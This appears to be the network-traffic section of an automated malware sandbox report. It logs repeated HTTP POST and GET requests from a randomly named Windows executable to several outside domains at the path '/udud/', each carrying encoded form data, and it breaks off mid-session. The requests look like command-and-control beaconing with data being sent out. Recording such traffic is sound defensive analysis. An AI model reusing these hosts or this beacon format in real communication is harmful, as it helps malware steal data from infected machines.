                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5saHZSaGz1v0aao0DSxxoukr680fJWWNSOduGJ+UZdcFq6A3Ri4lsRmP34Ju3n6lDjFjAgPBAevLfyHfEX9raQXYfuCTp7KdYe6UCAMeoJ9EFz0ANHUmClIvo/6r/yEKLzXaKxJgRJoLh6dv1THHoCXhpKACeRWqP+DHIylcUKZocFxsnT2k6PBQ==
                                                                                                May 27, 2024 12:32:23.958302975 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:23 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                14 | 192.168.11.30 | 49844 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:26.454904079 CEST | 762 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/2OdMOJvmxddFq6OXRnmVsamPrOJrPn6lHjFhIgPy4Zs7fwL/ER3LaQXYfuCSZdKeoe6kyAM7EK+EFyzANHF2ChIvpq6pK6EO7zXaaxJxRIhLh8SP0zHXsMYyVdPAOWMKH6Lw5o4fgIKIgottK70m7UcbHrOpfAlHjeEy4DO93DLoY=
                                                                                                May 27, 2024 12:32:26.624151945 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:26 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                15 | 192.168.11.30 | 49845 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:29.143093109 CEST | 1679 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX= [TRUNCATED]
                                                                                                May 27, 2024 12:32:29.322004080 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:29 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                16 | 192.168.11.30 | 49846 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:31.832165956 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:32.006409883 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:31 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                17 | 192.168.11.30 | 49847 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:37.370162964 CEST | 727 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJbQRIw/j2n6NZ3BJU9VwQESxLbt+mW8gh32Scra2OnaKuEh2cwi6fPAnh3g2jlXdln1o+5LYTU29OFmrPyJay18zBsDy7gEMzYGVnTpRfnsYQBlPlrvE6fwFHIP7swd7zbwUsOSozw/hwchus/oA8YSM7JF9+8PgXOnrk/SpnZHWNv+bLMvor1g==
                                                                                                May 27, 2024 12:32:37.560364962 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:32:37 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                18 | 192.168.11.30 | 49848 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:40.090612888 CEST | 747 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJKAhIycb2haNarRJUolwUES9LbsK2XOUh3SWcqfKOr6KuQx2Z9C7TPA7p3l2jlXJlnxs+54wQVm9MIGrJv5ay18zBsHaRgEEzZ2FnQL5c5cYTJFPlvvE+fwF1IOXSwfDzb1wsODo8+/hyDxvPxZowBBYGFEJ55etyCQa+iRdlKnqgz/2jOtpwog9n4VxGJmYIHjLM6clasrE=
                                                                                                May 27, 2024 12:32:40.280853987 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:32:40 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                19 | 192.168.11.30 | 49849 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:42.807821035 CEST | 1664 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:42.997834921 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:32:42 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                20 | 192.168.11.30 | 49850 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:45.526108027 CEST | 473 | OUT | GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:46.216331005 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:32:46 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==
                                                                                                last-modified: Mon, 27 May 2024 10:32:45 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-zspj5
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==><head><meta charset="utf-8"><title>l7aeh.us&nbsp;-&nbsp;l7aeh Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="l7aeh.us is your first and best source for all of the information youre looking for. From general topics to more


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                21 | 192.168.11.30 | 49851 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:52.571681023 CEST | 745 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxynPK65u0FOxjZVQYvVGm9qRGBZXq7ja20YyctE6ki7pM7eXYZmoU7XJN+diy1b4HIpukuhXqsE3m38YpDoWOuEj5Pk/ODq+NnD8L0iPIfjrxMFS/li9i+4ak+egAeh5Gu2DvmK1uHmDxjLqULtGXuqEw6JxDPFybo/B1W/vJHj+kiKivfRdtJBQ==
                                                                                                May 27, 2024 12:32:53.038614035 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:52 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.30 | 49852 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:32:55.391432047 CEST | 765 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxy1cS6+NcFMRjaMgYvbmmDqR6BZW+rjoS0bX4tF7ki3JM7W3YcioUwXJxMdg21b4TIpvUumkSvGnm1w4pFsWOuEj5Pk/bYq+FnCMb0kuIegrxPES/l09iy4aldei15h7+u2CzmLhyGozx5FKVBjVGWyAEmNA3iIyaN32EMis9FweYPWjC3TfsScYKSHBdk8DaJdR2sYaTg+cA=
May 27, 2024 12:32:55.841552019 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.30 | 49853 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:32:58.220835924 CEST | 1682 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:32:58.662247896 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.30 | 49854 | 183.111.161.243 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:33:01.067776918 CEST | 479 | OUT | GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:01.504887104 CEST | 475 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                25 | 192.168.11.30 | 49855 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:06.969628096 CEST | 745 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkobDJtd1TiWp5QHSbNI0Jw962rLRkBugoWH0pA3Wk+FyD7RHQEmGFnjxv1v6jQxVIch8jGZMWzgJXdnnFsr/5hKkVEK2VmKkztbFkX4zIlo0s9eZHiJsB1Wx7fmZmMAZyJ5AcVG5YaqvoYNr4Bx0eIZXYjmHskb3yPILUOQwVaHZcP6G9rR047w==
                                                                                                May 27, 2024 12:33:07.156255007 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:07 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                26 | 192.168.11.30 | 49856 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:09.690677881 CEST | 765 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkq4LJv6hTpWp4VHSbfI1hw9m2rKV0ULIoXmEpRGWkuVyDzxHVb2GOnj9R1v2jQxRIcgsjHugRywJVSHnHiL/5hKkVEKj+mK8zsr1kWabL7Y0v0+ZHmJsF1WxJfnEJMGdyJ8scVURZTqvyFdq9ERVOBdvHjUHPsLqHOf6OTTEXJnlxT7rVpT1jm6yovSlXS4CipPh6xfN7fp8=
                                                                                                May 27, 2024 12:33:09.877173901 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:09 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                27 | 192.168.11.30 | 49857 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:12.405865908 CEST | 1682 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
